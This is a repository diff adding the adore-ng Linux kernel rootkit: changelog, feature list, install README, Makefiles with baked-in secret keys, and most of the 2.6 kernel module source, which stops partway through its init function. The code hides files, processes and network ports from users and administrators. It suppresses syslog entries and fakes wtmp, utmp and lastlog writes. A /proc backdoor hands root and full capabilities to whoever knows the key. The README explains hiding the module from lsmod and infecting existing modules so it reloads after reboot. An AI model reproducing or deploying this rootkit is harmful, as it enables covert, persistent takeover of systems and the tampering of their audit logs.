packetstorm sync

24 files changed, 2685 insertions, 0 deletions

diff --git a/other/adore-ng/CVS/Entries b/other/adore-ng/CVS/Entries
new file mode 100644
index 0000000..328b9db
--- /dev/null
+++ b/other/adore-ng/CVS/Entries
@@ -0,0 +1,22 @@
+/Changelog/1.10/Sat Feb 28 00:15:23 2004//
+/FEATURES/1.2/Fri Jan 30 18:42:39 2004//
+/LICENSE/1.2/Tue Mar  2 04:57:07 2004//
+/Makefile.2.6.gen/1.11/Sat Feb 28 00:41:30 2004//
+/Makefile.gen/1.8/Sun Feb  8 03:35:15 2004//
+/README/1.7/Sun Jan  4 17:53:16 2004//
+/README.26/1.3/Sat Feb 28 00:15:23 2004//
+/adore-ng-2.6.c/1.9/Sat Feb 28 00:15:23 2004//
+/adore-ng.c/1.26/Tue Mar  2 04:57:07 2004//
+/adore-ng.h/1.3/Fri Jan  3 14:58:17 2003//
+/adore-ng.mod.c/1.1/Thu Jul 24 12:30:37 2003//
+/ava.c/1.3/Wed Nov  5 15:02:48 2003//
+/cleaner.c/1.2/Wed Feb 26 14:43:08 2003//
+/configure/1.17/Sat Feb 28 00:41:30 2004//
+/irq_vectors.h/1.2/Sat Feb 28 00:15:23 2004//
+/libinvisible.c/1.7/Mon Dec 22 23:29:46 2003//
+/libinvisible.h/1.1.1.1/Tue Dec 31 15:48:59 2002//
+/relink/1.1/Mon Dec 22 16:25:58 2003//
+/startadore/1.1/Tue Dec 23 22:49:17 2003//
+/symsed.c/1.1/Mon Dec 22 16:25:58 2003//
+/visible-start.c/1.4/Sat Feb 28 00:15:23 2004//
+D
diff --git a/other/adore-ng/CVS/Repository b/other/adore-ng/CVS/Repository
new file mode 100644
index 0000000..e195356
--- /dev/null
+++ b/other/adore-ng/CVS/Repository
@@ -0,0 +1 @@
+adore-ng
diff --git a/other/adore-ng/CVS/Root b/other/adore-ng/CVS/Root
new file mode 100644
index 0000000..3811072
--- /dev/null
+++ b/other/adore-ng/CVS/Root
@@ -0,0 +1 @@
+/cvs
diff --git a/other/adore-ng/Changelog b/other/adore-ng/Changelog
new file mode 100644
index 0000000..dd258c0
--- /dev/null
+++ b/other/adore-ng/Changelog
@@ -0,0 +1,174 @@
+1.41
+----
+
++ Wed Mar 3 2004
++ 2.6.3 tests, getting to know that some declarations are different
+  on 2.6.3
+
+1.40
+----
+
++ Sun Feb 29 2004
++ Ported all of the adore for 2.4 kernel to 2.6 kernel
+  (including socket hiding, syslog filtering and xtmp clearing)
+
+1.32
+----
+
++ Sun Feb  8 2004
++ Added fix in tcp_new_size() so it wont crash if lot
+  of TCP connections exist
+
+1.31
+----
+
++ Sat Jan  3 2004
++ Changed socket hijacking to work with 2.4.18 and below
++ SMP tests
+
+1.30 
+----
+
++ Sun Dec 21 2003
++ Added syslog filtering
++ Added wtmp/utmp/lastlog filtering
++ Restrict ADORE_KEY to 16 bytes max
++ Added relink script
++ Added symsed
++ Added startadore
++ Added LKM infection for reboot residency
+
+
+1.26
+----
+
++ heh, forgot to update $current_adore before tagging
+  to version 0.26 :)
+
+1.25
+----
+
++ Hidden 'ps' (started from hidden shell) must be able
+  to see itself on /proc. Otherwise some distros make
+  probs. Fixed!
++ Added 'I' switch to ava
+
+
+1.23
+----
+
++ 2.6 port
++ added visible-start
+
+1.12
+----
+
++ fixed adore_atoi() respect to /proc misbehaivior
+  a PID of 672 has the string "672üA" so make atoi()
+  handle this
++ fixed adore_init() which did not checked ssuid
+  correctly
+
+
+1.11
+----
+
++ rewrote most parts (using VFS etc)
+  -> adore-ng
+
+0.53
+----
+
++ #define PID_MAX if not found
+
+
+0.52
+----
++ support 16 and 32 bit UID/GID
++ using spin-locks
++ hooking lookup in proc_root, so many adore-testers
+  fail now
++ much better tcp-connection hiding, also via proc
++ removed file redirection
++ added elite_gid, so its now impossible to detect adore by
+  chown()+getdents() bruteforce
++ elite_uid/elite_gid are randomly choosen by "configure"
++ close() should return EBADF when
+  user is not authenticated. It does so now.
+
+0.42
+----
+
++ Added devpts fix.
+
+0.41
+----
+
++ fixed is_secret64() to properly hide files.
++ removed memleak
+
+0.40
+----
+
++ fixed some typo in cleanup_module()
+
+
+0.39b
+-----
+
++ open()/stat() redirection
++ no more exec redir
++ Added possiblility to hide more than one service
+  (netstat -an vs. -al)
++ This is a Beta version! It is for testing purposes,
+  whether open/stat redir works properly.
+
+0.38
+----
+
++ Nothing. CVS-internally thing.
+ 
+
+0.36
+----
+
++ Added rename.c as generic way to rename/rmmod protection
+  modules such as StMichael.
++ Fixed libinvisble: Dont follow links on chown() ->
+  now properly hides symlinks
+
+0.35
+----
+
++ Added 64 bit FS support, for 2.4 plus new glibc
+
+
+0.33
+----
+
++ Added auth via mkdir(2) to defeat scanners
++ setuid() -> close() change since 2.4 kernel uses setuid32()
+
+
+0.32
+----
+
++ added kgcc check in configure
++ added exec-redirection
++ made 'R' switch stable (now official feature)
+
+
+0.31
+----
++ empty module-list doesn't crash anymore :)
++ removed syslog dis/enabling coz a lot of ppl told me its not of much use
+  and it only costs porting time and robustness
++ added removing of procs
++ no chkroot defat anymore. there are too many ways to detect rootkits
+
+
+...
+sowhere below
+
++ Added 'cant be killed from normal processes'
+
diff --git a/other/adore-ng/FEATURES b/other/adore-ng/FEATURES
new file mode 100644
index 0000000..1e88216
--- /dev/null
+++ b/other/adore-ng/FEATURES
@@ -0,0 +1,30 @@
+
+If you never used adore before, here's a list of supported
+things:
+
+ o runs on kernel 2.4.x UP and SMP systems
+ o first test-versions successfully run on 2.6.0
+ o file and directory hiding
+ o process hiding
+ o socket-hiding (no matter whether LISTENing, CONNECTED etc)
+ o full-capability back door
+ o does not utilize sys_call_table but VFS layer
+ o KISS principle, to have as less things in there as possible
+   but also being as much powerful as possible
+
+new with adore-ng 0.30:
+
+ o syslog filtering: logs generated by hidden processes never appear
+   on the syslog UNIX socket anymore
+ o wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes
+   do not appear in the file, except you force it by using special hidden
+   AND authenticated process (a sshd back door is usually only hidden thus
+   xtmp entries written by sshd don't make it to disk)
+ o (optional) relinking of LKMs as described in phrack #61 aka LKM infection
+   to make it possible to be automatically reloaded after reboots
+
+The build and installation process is usually as easy as
+'./configure && make && ./startadore' and/or
+'./configure && make && ./relink' so you can set up your honey-pot
+test-environment very easily.
+
diff --git a/other/adore-ng/LICENSE b/other/adore-ng/LICENSE
new file mode 100644
index 0000000..63d3b1a
--- /dev/null
+++ b/other/adore-ng/LICENSE
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2000-2004 Stealth.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Stealth.
+ * 4. The name Stealth may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
diff --git a/other/adore-ng/Makefile.2.6.gen b/other/adore-ng/Makefile.2.6.gen
new file mode 100644
index 0000000..78ea182
--- /dev/null
+++ b/other/adore-ng/Makefile.2.6.gen
@@ -0,0 +1,29 @@
+#
+CC=cc
+CFLAGS=-O2 -Wall
+
+CFLAGS+=-mcpu=i486
+INC=-I/mnt/linux-2.6.3/include -I.
+CFLAGS+=-DKBUILD_MODNAME=adore -DKBUILD_BASENAME=adore -fno-common
+CFLAGS+=-DELITE_UID=2618748389U -DELITE_GID=4063569279U
+CFLAGS+=-DCURRENT_ADORE=41
+CFLAGS+=-DADORE_KEY=\"fgjgggfd\"
+
+#CFLAGS+=-D__SMP__
+
+#CFLAGS+=-DMODVERSIONS
+
+all:    adore-ng ava
+
+adore-ng: adore-ng-2.6.c
+        rm -f adore-ng.o
+        $(CC) -c $(INC) $(CFLAGS) adore-ng.mod.c -o adore-ng.mod.o
+        $(CC) -c $(INC) $(CFLAGS) adore-ng-2.6.c -o adore-ng.o
+        ld -m elf_i386 -r -o adore.ko adore-ng.o adore-ng.mod.o
+
+ava: ava.c libinvisible.c
+        $(CC) $(CFLAGS) ava.c libinvisible.c -o ava
+
+clean:
+        rm -f core ava *.o
+
diff --git a/other/adore-ng/Makefile.gen b/other/adore-ng/Makefile.gen
new file mode 100644
index 0000000..28eb091
--- /dev/null
+++ b/other/adore-ng/Makefile.gen
@@ -0,0 +1,33 @@
+#
+CC=cc
+CFLAGS=-O2 -Wall
+#ld -m elf_i386 -r 
+# KBUILD_BASENAME adore-ng KBUILD_MODNAME=adore-ng
+#CFLAGS+=-mcpu=i486
+INC=-I/usr/src/linux/include
+CFLAGS+=-DELITE_UID=764385989U -DELITE_GID=2219856091U
+CFLAGS+=-DCURRENT_ADORE=32
+CFLAGS+=-DADORE_KEY=\"gfsgfgdf\"
+
+#CFLAGS+=-D__SMP__
+
+#CFLAGS+=-DMODVERSIONS
+
+all:    adore-ng ava cleaner symsed
+
+adore-ng: adore-ng.c
+        rm -f adore-ng.o
+        $(CC) -c $(INC) $(CFLAGS) adore-ng.c -o adore-ng.o
+        $(CC) -c $(INC) $(CFLAGS) -DRELINKED adore-ng.c -o zero.o
+
+ava: ava.c libinvisible.c
+        $(CC) $(CFLAGS) ava.c libinvisible.c -o ava
+
+cleaner: cleaner.c
+        $(CC) $(INC) -c $(CFLAGS) cleaner.c
+
+symsed: symsed.c
+        $(CC) -O2 symsed.c -o symsed
+
+clean:
+        rm -f core ava *.o
diff --git a/other/adore-ng/README b/other/adore-ng/README
new file mode 100644
index 0000000..7a5ebee
--- /dev/null
+++ b/other/adore-ng/README
@@ -0,0 +1,163 @@
+Please read this! It is important. Otherwise you maybe crash your kernel!
+=========================================================================
+
+
+0. Intro
+--------
+
+Only *YOU* are responsible for your own actions. So if you are
+dumb enough to own machines and install this software on it,
+only you can be blamed for it.
+
+Do not say you have not been warned!
+
+
+1. Install by hand
+------------------
+
+You can skip this section if you want to use the "configure"
+script. This section might be important if the configure
+script does not run somehow or produces wrong output.
+
+Edit Makefile and set proper values.
+
+Everyone should choose an own ADORE_KEY to make it impossible to scan
+for installed adore. Also ELITE_UID and ELITE_GID should be
+changed to own values.
+When commenting in the MODVERSIONS-switch, adore will be compiled
+for modversioned kernels. Modversioned kernels have a /proc/ksyms file
+that looks like
+
+...
+foo_barR12345678
+...
+
+where normal kernels would look like
+
+...
+foo_bar
+...
+
+On some systems it can't find modversions.h. Try disabling MODVERSIONS even
+when you see the symbols are version-ed. It seems to me that using MODVERSIONS
+isn't necessary on newer kernels.
+
+
+Hidden ports (adore-ng.h) go decimal, i.e. '2222' hides everything which belongs to port
+2222.
+The tcp-hiding has been redesigned completely. It uses a technique similar to
+the one described by palmers in phrack (http://www.phrack.org/show.php?p=58&a=6)
+By default 2222 and 7350 are hidden. Only IPv4 (tcp4) stuff is hidden.
+
+It is now very hard for adore-scanners to find a running adore because
+it is not longer possible to chdir() or stat() PID-dirs in /proc
+if PID is hidden. It is completely invisible, except to processes which
+are hidden them self.
+Files are now hidden using both, a ELITE_UID and a ELITE_GID which are chosen
+randomly upon 'configure'. So we have 2**64 possible values which is
+impossible to brute-force and thus checking for hidden files by brute-forcing
+uid/gid.
+
+Older Linux systems have a width of 16 bit for UID's and GID's, newer systems
+have 32 bit. Adore supports both. Either give 4 (for 32 bit) or 2 (for 16 bit)
+as argument to configure e.g. 'configure 4'. The default is 4.
+
+
+Make sure SMP is enabled when it is in kernel.
+Don't forget to recompile when you changed Makefile.
+Two 'makes' may produce two different adore's that maybe can't
+interact (i.e. further hidden-files are visible now due to UID-change).
+For this reason, the Makefiles are backed-up to allow a restore.
+
+
+
+2. Install by script
+--------------------
+
+Run configure-script.
+Script should give you some messages which uid's are used etc.
+View Makefile to see if everything is fine. Edit adore-ng.h to meet
+with your services you want to hide. Defaults to port 2222 and 7350.
+Do 'make'.
+"insmod ./adore.o" as root.
+Use "ava" to hide files, processes and so on then.
+
+When ava responds, there is no adore, but you are sure there is,
+then you maybe compiled adore.o and ava with different ADORE_KEY's.
+Do 'make clean; make' to put it in sync.
+
+"insmod ./cleaner.o; rmmod cleaner" to hide the adore LKM from lsmod.
+Or use "startadore" script. Use "relink" script to relink adore-ng
+into one of the LKMs already available on the system, so it is
+automatically loaded during reboot.
+
+3. libinvisible
+---------------
+
+libinvisible was written to have a layer between adore and ava.
+Since there are other OS's which may be targeted by adore-like modules,
+ava.c could easily ported, if one writes the proper library-calls.
+libinvisible maybe also used from within sysop-written hidden logdeamons
+as easy API to adore.
+
+
+Adore was written for EDUCATIONAL PURPOSES, for testing on honey-pot 
+boxens (watching suspicious "broken" accounts) and intrusion testings.
+If you need more help watching broken accounts, you may also use
+EoE to watch what is executed.
+
+
+4. Use 'R' with care
+--------------------
+
+'R' switch of ava isn't well researched. It may crash your machine.
+'R'emoving current shell isn't good idea.
+
+
+5. A word on detecting root-kits
+-------------------------------
+
+Adore has quite good anti-detection measurements in version 0.5 and better.
+Since we use the new proc technique we completely control what user-space
+programs see. It isn't even longer possible to detect hidden processes
+by walking through the task-list and checking for PF_INVISBLE flag
+because adore now uses a different approach to check for hidden procs.
+I know of tools which read the disk raw by accessing /dev/hdXY and comparing
+getdents() result with it. Thats the only thing where someone may detect
+adore yet, but only if there are hidden files! It is not necessary to hide
+files in all cases. Plus, modern systems support file-systems which are located
+completely in-memory. This technique will fail here.
+
+Child-processes of hidden processes are hidden automatically.
+
+
+6. Troubleshooting
+------------------
+
+In case gcc can't find modversions.h try to disable
+MODVERSIONS flag in Makefile.
+
+
+7. SMP primer
+-------------
+
+Adore-ng was successfully tested on UP and SMP systems.
+
+
+
+8. etc
+-------
+
+You can also control adore-ng by hand via echo & cat, look at adore-ng.c
+to see how.
+You can specify an optional FS where files can be hidden.
+Only use this switch ("insmod adore-ng.o opt_fs=/opt" for example)
+when you are sure that / and (your particular) /opt have a different
+FS, for example ext3 on / and reiser on /opt. otherwise you will
+get FS inconsistencies for sure. The opt_fs argument should not
+be needed in most cases anyway. Mounts of other partitions with the same
+FS will be affected by adore too. So if / and /opt both have ext3, you
+dont need to worry. Adore will handle both without a opt_fs switch.
+
+Stealth
+
diff --git a/other/adore-ng/README.26 b/other/adore-ng/README.26
new file mode 100644
index 0000000..72a3d73
--- /dev/null
+++ b/other/adore-ng/README.26
@@ -0,0 +1,29 @@
+adore-ng works on kernel 2.6!
+
+2.6.0-test1 and 2.6.3 UP tested! SMP has not been tested.
+
+You need the module-init-tools for the new insmod, rmmod etc,
+the old ones don't work anymore.
+
+To build a adore for 2.6, use the "Makefile.2.6.gen" makefile
+after you customized the elite UID etc (or you did not,
+I dont care at all).
+
+The 2.6.0-test1 kernel has a different declaration for
+the unix_dgram_recvmg() function than the 2.6.3 kernel. Thats
+why you may get some warning on 2.6.0 builds. You can ignore them.
+
+With the 2.6 kernel, a version magic is build into the kernel
+module (which are now .ko files carrying more info than
+the old .o files for 2.4) which is even checked at loading time.
+So, if the kernel is build with a different compiler than the
+one used for building the module, you get an error like:
+
+adore: version magic '2.6.3 586 gcc-3.2' should be '2.6.3 586 gcc-3.3'
+
+To circumvent this you can set an own version magic in the
+adore-ng.mod.c file (makes sense to use '2.6.3 586 gcc-3.3'
+in this case.)
+
+S.
+
diff --git a/other/adore-ng/adore-ng-2.6.c b/other/adore-ng/adore-ng-2.6.c
new file mode 100644
index 0000000..c0a30f7
--- /dev/null
+++ b/other/adore-ng/adore-ng-2.6.c
@@ -0,0 +1,604 @@
+/*** (C) 2004 by Stealth
+ ***
+ *** http://spider.scorpions.net/~stealth
+ *** http://stealth.7350.org/rootkits
+ ***    
+ ***
+ *** (C)'ed Under a BSDish license. Please look at LICENSE-file.
+ *** SO YOU USE THIS AT YOUR OWN RISK!
+ *** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS. 
+ *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
+ ***
+ ***    -> Use ava to get all the things workin'.
+ ***
+ ***/
+#define __KERNEL__
+#define MODULE
+
+#define LINUX26
+
+#ifdef MODVERSIONS
+#include <linux/modversions.h>
+#endif
+
+#include <linux/config.h>
+#include <linux/types.h>
+#include <linux/sched.h>
+#include <linux/kernel.h>
+#include <linux/module.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/file.h>
+#include <linux/mount.h>
+#include <linux/proc_fs.h>
+#include <linux/capability.h>
+#include <linux/spinlock.h>
+#include <linux/pid.h>
+#include <linux/init.h>
+#include <linux/seq_file.h>
+
+#include <net/sock.h>
+#include <linux/un.h>
+#include <net/af_unix.h>
+#include <linux/aio.h>
+
+#include "adore-ng.h"
+
+
+char *proc_fs = "/proc";        /* default proc FS to hide processes */
+MODULE_PARM(proc_fs, "s");
+char *root_fs = "/";            /* default FS to hide files */
+
+MODULE_PARM(root_fs, "s");
+char *opt_fs = NULL;
+MODULE_PARM(opt_fs, "s");
+
+
+typedef int (*readdir_t)(struct file *, void *, filldir_t);
+readdir_t orig_root_readdir=NULL,orig_opt_readdir=NULL,orig_proc_readdir=NULL;
+
+struct dentry *(*orig_proc_lookup)(struct inode *, struct dentry *,
+                                   struct nameidata *) = NULL;
+
+
+static void adore_cleanup();
+
+
+#ifndef PID_MAX
+#define PID_MAX 0x8000
+#endif
+
+static char hidden_procs[PID_MAX/8+1];
+
+inline void hide_proc(pid_t x)
+{
+        if (x >= PID_MAX || x == 1)
+                return;
+        hidden_procs[x/8] |= 1<<(x%8);
+}
+
+inline void unhide_proc(pid_t x)
+{
+        if (x >= PID_MAX)
+                return;
+        hidden_procs[x/8] &= ~(1<<(x%8));
+}
+
+inline char is_invisible(pid_t x)
+{
+        if (x >= PID_MAX)
+                return 0;
+        return hidden_procs[x/8]&(1<<(x%8));
+}
+
+/* Theres some crap after the PID-filename on proc
+ * getdents() so the semantics of this function changed:
+ * Make "672" -> 672 and
+ * "672|@\"   -> 672 too
+ */
+int adore_atoi(const char *str)
+{
+        int ret = 0, mul = 1;
+        const char *ptr;
+   
+        for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++) 
+                ;
+        ptr--;
+        while (ptr >= str) {
+                if (*ptr < '0' || *ptr > '9')
+                        break;
+                ret += (*ptr - '0') * mul;
+                mul *= 10;
+                ptr--;
+        }
+        return ret;
+}
+
+/* Own implementation of find_task_by_pid() */
+struct task_struct *adore_find_task(pid_t pid)
+{
+        struct task_struct *p;
+
+        read_lock(&tasklist_lock);      
+        for_each_task(p) {
+                if (p->pid == pid) {
+                        read_unlock(&tasklist_lock);
+                        return p;
+                }
+        }
+        read_unlock(&tasklist_lock);
+        return NULL;
+}
+
+int should_be_hidden(pid_t pid)
+{
+        struct task_struct *p = NULL;
+
+        if (is_invisible(pid)) {
+                return 1;
+        }
+
+        p = adore_find_task(pid);
+        if (!p)
+                return 0;
+
+        /* If the parent is hidden, we are hidden too XXX */
+        task_lock(p);
+
+        if (is_invisible(p->parent->pid)) {
+                task_unlock(p);
+                hide_proc(pid);
+                return 1;
+        }
+
+        task_unlock(p);
+        return 0;
+}
+
+/* You can control adore-ng without ava too:
+ *
+ * echo > /proc/<ADORE_KEY> will make the shell authenticated,
+ * echo > /proc/<ADORE_KEY>-fullprivs will give UID 0,
+ * cat /proc/hide-<PID> from such a shell will hide PID,
+ * cat /proc/unhide-<PID> will unhide the process
+ */
+struct dentry *adore_lookup(struct inode *i, struct dentry *d,
+                            struct nameidata *nd)
+{
+        task_lock(current);
+
+        if (strncmp(ADORE_KEY, d->d_iname, strlen(ADORE_KEY)) == 0) {
+                current->flags |= PF_AUTH;
+                current->suid = ADORE_VERSION;
+        } else if ((current->flags & PF_AUTH) &&
+                   strncmp(d->d_iname, "fullprivs", 9) == 0) {
+                current->uid = 0;
+                current->suid = 0;
+                current->euid = 0;
+                current->gid = 0;
+                current->egid = 0;
+                current->fsuid = 0;
+                current->fsgid = 0;
+
+                cap_set_full(current->cap_effective);
+                cap_set_full(current->cap_inheritable);
+                cap_set_full(current->cap_permitted);
+        } else if ((current->flags & PF_AUTH) &&
+                   strncmp(d->d_iname, "hide-", 5) == 0) {
+                hide_proc(adore_atoi(d->d_iname+5));
+        } else if ((current->flags & PF_AUTH) &&
+                   strncmp(d->d_iname, "unhide-", 7) == 0) {
+                unhide_proc(adore_atoi(d->d_iname+7));
+        } else if ((current->flags & PF_AUTH) &&
+                   strncmp(d->d_iname, "uninstall", 9) == 0) {
+                        cleanup_module();
+        }
+
+        task_unlock(current);
+
+        if (should_be_hidden(adore_atoi(d->d_iname)) &&
+        /* A hidden ps must be able to see itself! */
+            !should_be_hidden(current->pid))
+                return NULL;
+
+        return orig_proc_lookup(i, d, nd);
+}
+
+
+filldir_t proc_filldir = NULL;
+spinlock_t proc_filldir_lock = SPIN_LOCK_UNLOCKED;
+
+int adore_proc_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
+{
+        if (should_be_hidden(adore_atoi(name)))
+                return 0;
+        return proc_filldir(buf, name, nlen, off, ino, x);
+}
+
+
+
+int adore_proc_readdir(struct file *fp, void *buf, filldir_t filldir)
+{
+        int r = 0;
+
+        spin_lock(&proc_filldir_lock);
+        proc_filldir = filldir;
+        r = orig_proc_readdir(fp, buf, adore_proc_filldir);
+        spin_unlock(&proc_filldir_lock);
+        return r;
+}
+
+
+filldir_t opt_filldir = NULL;
+struct super_block *opt_sb[1024];
+
+int adore_opt_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
+{
+        struct inode *inode = NULL;
+        int r = 0;
+        uid_t uid;
+        gid_t gid;
+
+        if ((inode = iget(opt_sb[current->pid % 1024], ino)) == NULL)
+                return 0;
+        uid = inode->i_uid;
+        gid = inode->i_gid;
+        iput(inode);
+
+        /* Is it hidden ? */
+        if (uid == ELITE_UID && gid == ELITE_GID) {
+                r = 0;
+        } else
+                r = opt_filldir(buf, name, nlen, off, ino, x);
+
+        return r;
+}
+
+
+int adore_opt_readdir(struct file *fp, void *buf, filldir_t filldir)
+{
+        int r = 0;
+
+        if (!fp || !fp->f_vfsmnt)
+                return 0;
+
+        opt_filldir = filldir;
+        opt_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
+        r = orig_opt_readdir(fp, buf, adore_opt_filldir);
+        
+        return r;
+}
+
+
+
+/* About the locking of these global vars:
+ * I used to lock these via rwlocks but on SMP systems this can cause
+ * a deadlock because the iget() locks an inode itself and I guess this
+ * could cause a locking situation of AB BA. So, I do not lock root_sb and
+ * root_filldir (same with opt_) anymore. root_filldir should anyway always
+ * be the same (filldir64 or filldir, depending on the libc). The worst thing that
+ * could happen is that 2 processes call filldir where the 2nd is replacing
+ * root_sb which affects the 1st process which AT WORST CASE shows the hidden files.
+ * Following conditions have to be met then: 1. SMP 2. 2 processes calling getdents()
+ * on 2 different partitions with the same FS.
+ * Now, since I made an array of super_blocks it must also be that the PIDs of
+ * these procs have to be the same PID modulo 1024. This sitation (all 3 cases must
+ * be met) should be very very rare.
+ */
+filldir_t root_filldir = NULL;
+struct super_block *root_sb[1024];
+
+
+
+int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
+{
+        struct inode *inode = NULL;
+        int r = 0;
+        uid_t uid;
+        gid_t gid;
+
+        if ((inode = iget(root_sb[current->pid % 1024], ino)) == NULL)
+                return 0;
+        uid = inode->i_uid;
+        gid = inode->i_gid;
+        iput(inode);
+
+        /* Is it hidden ? */
+        if (uid == ELITE_UID && gid == ELITE_GID) {
+                r = 0;
+        } else
+                r = root_filldir(buf, name, nlen, off, ino, x);
+
+        return r;
+}
+
+
+int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir)
+{
+        int r = 0;
+
+        if (!fp || !fp->f_vfsmnt)
+                return 0;
+
+        root_filldir = filldir;
+        root_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
+        r = orig_root_readdir(fp, buf, adore_root_filldir);
+        
+        return r;
+}
+
+
+int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
+{
+        struct file *filep;
+        
+        if ((filep = filp_open(p, O_RDONLY, 0)) == NULL) {
+                return -1;
+        }
+
+        if (orig_readdir)
+                *orig_readdir = filep->f_op->readdir;
+
+        filep->f_op->readdir = new_readdir;
+        filp_close(filep, 0);
+        return 0;
+}
+
+
+int unpatch_vfs(const char *p, readdir_t orig_readdir)
+{
+        struct file *filep;
+        
+        if ((filep = filp_open(p, O_RDONLY, 0)) == NULL) {
+                return -1;
+        }
+
+        filep->f_op->readdir = orig_readdir;
+        filp_close(filep, 0);
+        return 0;
+}
+
+
+char *strnstr(const char *haystack, const char *needle, size_t n)
+{
+        char *s = strstr(haystack, needle);
+        if (s == NULL)
+                return NULL;
+        if (s-haystack+strlen(needle) <= n)
+                return s;
+        else
+                return NULL;
+}
+
+
+struct proc_dir_entry *proc_find_tcp()
+{
+        struct proc_dir_entry *p = proc_net->subdir;
+
+        while (strcmp(p->name, "tcp"))
+                p = p->next;
+        return p;
+}
+
+
+#define NET_CHUNK 150
+
+struct tcp_seq_afinfo {
+        struct module *owner;
+        char *name;
+        unsigned short family;
+        int (*seq_show) (struct seq_file *, void *);
+        struct file_operations *seq_fops;
+};
+
+int (*orig_tcp4_seq_show)(struct seq_file*, void *) = NULL;
+
+int adore_tcp4_seq_show(struct seq_file *seq, void *v)
+{
+        int i = 0, r = 0;
+        char port[12];
+
+        r = orig_tcp4_seq_show(seq, v);
+
+        for (i = 0; HIDDEN_SERVICES[i]; ++i) {
+                sprintf(port, ":%04X", HIDDEN_SERVICES[i]);
+
+                /* Ignore hidden blocks */
+                if (strnstr(seq->buf + seq->count-NET_CHUNK,port,NET_CHUNK)) {
+                        seq->count -= NET_CHUNK;
+                        break;
+                }
+        }
+        
+        return r;
+}
+
+static
+int (*orig_unix_dgram_recvmsg)(struct kiocb *, struct socket *, struct msghdr *,
+                               size_t, int) = NULL;
+static struct proto_ops *unix_dgram_ops = NULL;
+
+int adore_unix_dgram_recvmsg(struct kiocb *kio, struct socket *sock,
+                             struct msghdr *msg, size_t size, int flags)
+{
+        struct sock *sk = NULL;
+        int noblock = flags & MSG_DONTWAIT;
+        struct sk_buff *skb = NULL;
+        int err;
+        struct ucred *creds = NULL;
+        int not_done = 1;
+
+        if (strcmp(current->comm, "syslogd") != 0 || !msg || !sock)
+                goto out;
+
+        sk = sock->sk;
+
+        err = -EOPNOTSUPP;
+        if (flags & MSG_OOB)
+                goto out;
+
+        do {
+                msg->msg_namelen = 0;
+                skb = skb_recv_datagram(sk, flags|MSG_PEEK, noblock, &err);
+                if (!skb)
+                        goto out;
+                creds = UNIXCREDS(skb);
+                if (!creds)
+                        goto out;
+                if ((not_done = should_be_hidden(creds->pid)))
+                        skb_dequeue(&sk->sk_receive_queue);
+        } while (not_done);
+
+out:
+        err = orig_unix_dgram_recvmsg(kio, sock, msg, size, flags);
+        return err;
+}
+
+
+static struct file *var_files[] = {
+        NULL,
+        NULL,
+        NULL,
+        NULL
+};
+
+static char *var_filenames[] = {
+        "/var/run/utmp",
+        "/var/log/wtmp",
+        "/var/log/lastlog",
+        NULL
+};
+
+static
+ssize_t (*orig_var_write)(struct file *, const char *, size_t, loff_t *) = NULL;
+
+static
+ssize_t adore_var_write(struct file *f, const char *buf, size_t blen, loff_t *off)
+{
+        int i = 0;
+
+        /* If its hidden and if it has no special privileges and
+         * if it tries to write to the /var files, fake it
+         */
+        if (should_be_hidden(current->pid) &&
+            !(current->flags & PF_AUTH)) {
+                for (i = 0; var_filenames[i]; ++i) {
+                        if (var_files[i] &&
+                            var_files[i]->f_dentry->d_inode->i_ino == f->f_dentry->d_inode->i_ino) {
+                                *off += blen;
+                                return blen;
+                        }
+                }
+        }
+        return orig_var_write(f, buf, blen, off);
+}       
+
+
+static int patch_syslog()
+{
+        struct socket *sock = NULL;
+
+        /* PF_UNIX, SOCK_DGRAM */
+        if (sock_create(1, 2, 0, &sock) < 0)
+                return -1;
+
+        if (sock && (unix_dgram_ops = sock->ops)) {
+                orig_unix_dgram_recvmsg = unix_dgram_ops->recvmsg;
+                unix_dgram_ops->recvmsg = adore_unix_dgram_recvmsg;
+                sock_release(sock);
+        }
+
+        return 0;
+}
+
+
+static int __init adore_init()
+{
+        struct proc_dir_entry *pde = NULL;
+        struct tcp_seq_afinfo *t_afinfo = NULL;
+        int i = 0, j = 0;
+
+        memset(hidden_procs, 0, sizeof(hidden_procs));
+
+        pde = proc_find_tcp();
+        t_afinfo = (struct tcp_seq_afinfo*)pde->data;
